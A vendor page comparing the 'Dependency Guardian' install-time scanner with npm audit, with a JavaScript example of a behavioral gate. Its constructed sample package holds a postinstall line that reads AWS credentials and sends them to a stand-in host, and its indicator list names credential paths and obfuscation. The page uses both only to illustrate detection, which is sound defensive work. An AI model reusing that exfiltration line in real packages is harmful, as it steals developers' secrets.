Dependency Guardian vs npm audit: known CVEs vs malicious behavior
npm audit checks your installed dependencies against the npm advisory database — a list of vulnerabilities that have already been reported and assigned an advisory. Dependency Guardian reads the package's actual published code for malicious behavior before it installs. The difference matters most for a brand-new attack, which by definition has no advisory yet.
| | Dependency Guardian | npm audit |
|---|---|---|
| What it checks | The package's published code and runtime behavior | Your dependency tree against reported advisories (source: npm Docs, "About audit reports") |
| Catches a zero-day supply chain attack | Yes — behavior is visible before any advisory exists | Not until an advisory is published for it |
| Detection method | Behavioral static analysis plus sandbox routing | Database lookup of known CVEs/advisories |
| Enforcement point | At install time — a malicious package is refused | A report after install; no install-time block (source: npm Docs, "About audit reports") |
| Cost | Free tier, no signup for the CLI scanner | Built into npm, free |
Different questions, not better and worse
npm audit is genuinely useful and it is free and already in your toolchain — it tells you which of your dependencies have a reported vulnerability so you can patch them. What it cannot do is tell you that a package you are about to install is malicious, because malicious packages do not file advisories against themselves. The interesting supply chain malware — a postinstall script that reads your AWS credentials, an obfuscated payload that phones home — is live and spreading during the hours or days before anyone reports it.
Dependency Guardian is looking at behavior, not reports, so it can flag that package on first sight. The two are complementary: keep running npm audit for known-CVE hygiene, and add a behavioral install-time gate for the attacks audit structurally cannot see.
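To make the contrast concrete, here is an added illustration (not Dependency Guardian's own code) of what an install-time behavioral gate looks at that an advisory lookup never reads: the package's lifecycle scripts and the file they run. The sample package, its file name and the indicator list are constructed assumptions for this example.

```javascript
// Added example: a minimal install-time behavioral gate for an npm package.
// Unlike `npm audit`, it never consults an advisory database; it reads the
// manifest's lifecycle hooks and the script body they execute.

// Constructed sample package (hypothetical name and file; not a real package).
const SAMPLE_PACKAGE = {
  manifest: {
    name: 'example-left-pad-helper',
    version: '1.0.3',
    scripts: { postinstall: 'node setup.js' },
  },
  files: {
    'setup.js':
      "const fs=require('fs');const os=require('os');" +
      "const c=fs.readFileSync(os.homedir()+'/.aws/credentials','utf8');" +
      "require('https').request({host:'example.invalid',method:'POST'}).end(c);",
  },
};

// Behavioral indicators worth surfacing at install time, each with a weight.
const INDICATORS = [
  { id: 'credential-path', weight: 3, re: /\.aws\/credentials|\.npmrc|\.ssh\/|\.docker\/config\.json/ },
  { id: 'env-read',        weight: 1, re: /process\.env/ },
  { id: 'network',         weight: 2, re: /require\(['"](https?|net|dns)['"]\)|fetch\(/ },
  { id: 'child-process',   weight: 2, re: /require\(['"]child_process['"]\)/ },
  { id: 'obfuscation',     weight: 2, re: /\beval\(|new Function\(|Buffer\.from\([^)]*['"]base64['"]\)/ },
];

// Hooks npm runs automatically during install, i.e. code that executes
// before the package is ever required by your application.
const LIFECYCLE = ['preinstall', 'install', 'postinstall', 'prepare'];

// Returns { verdict, score, findings }; verdict is 'block' | 'warn' | 'pass'.
function scanPackage(pkg) {
  const findings = [];
  const scripts = pkg.manifest.scripts || {};
  let code = '';
  for (const hook of LIFECYCLE) {
    if (!scripts[hook]) continue;
    findings.push({ id: `lifecycle:${hook}`, weight: 1 });
    // Resolve `node <file>` to the file in the tarball so its body is scanned too.
    const m = /^node\s+([\w./-]+)/.exec(scripts[hook]);
    code += scripts[hook] + '\n' + ((m && pkg.files[m[1]]) || '');
  }
  for (const ind of INDICATORS) {
    if (ind.re.test(code)) findings.push({ id: ind.id, weight: ind.weight });
  }
  const score = findings.reduce((s, f) => s + f.weight, 0);
  const verdict = score >= 5 ? 'block' : score >= 2 ? 'warn' : 'pass';
  return { verdict, score, findings };
}

console.log(JSON.stringify(scanPackage(SAMPLE_PACKAGE)));
```

The sample package scores lifecycle hook + credential path + network, so it is blocked even though no advisory exists for it; a package whose postinstall only reads `process.env` lands on warn, and one with no install hooks passes.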
Where npm audit is enough
If your only concern is keeping up with disclosed vulnerabilities in well-known packages, and you are comfortable with a report you act on rather than a block at install time, npm audit covers that and costs nothing. You do not need a behavioral scanner to learn that an old lodash has a prototype pollution advisory.
One limitation worth naming: Dependency Guardian does not replace vulnerability management. It catches malicious behavior, not every known CVE in your tree — keep npm audit or a dedicated SCA tool for disclosed-vulnerability tracking.
Questions
Is npm audit enough on its own?
For tracking disclosed vulnerabilities in your dependencies, yes. For catching a malicious package before it installs, no — npm audit only knows about threats that already have an advisory, and a fresh supply chain attack has none. Pair it with a behavioral install-time scanner to close that gap.
Does npm audit detect malware?
Not as a design goal. npm audit matches your dependency tree against the npm advisory database of reported vulnerabilities. Novel malicious packages have no advisory, so they pass npm audit until someone reports them. Dependency Guardian reads the code for malicious behavior instead, so it can flag a package on first sight.
Try the install-time firewall
Free for the CLI scanner, no signup. It reads the published artifact for malicious behavior and returns a block, warn or pass verdict before the package installs.
```
npm install -g @westbayberry/dg && dg scan
```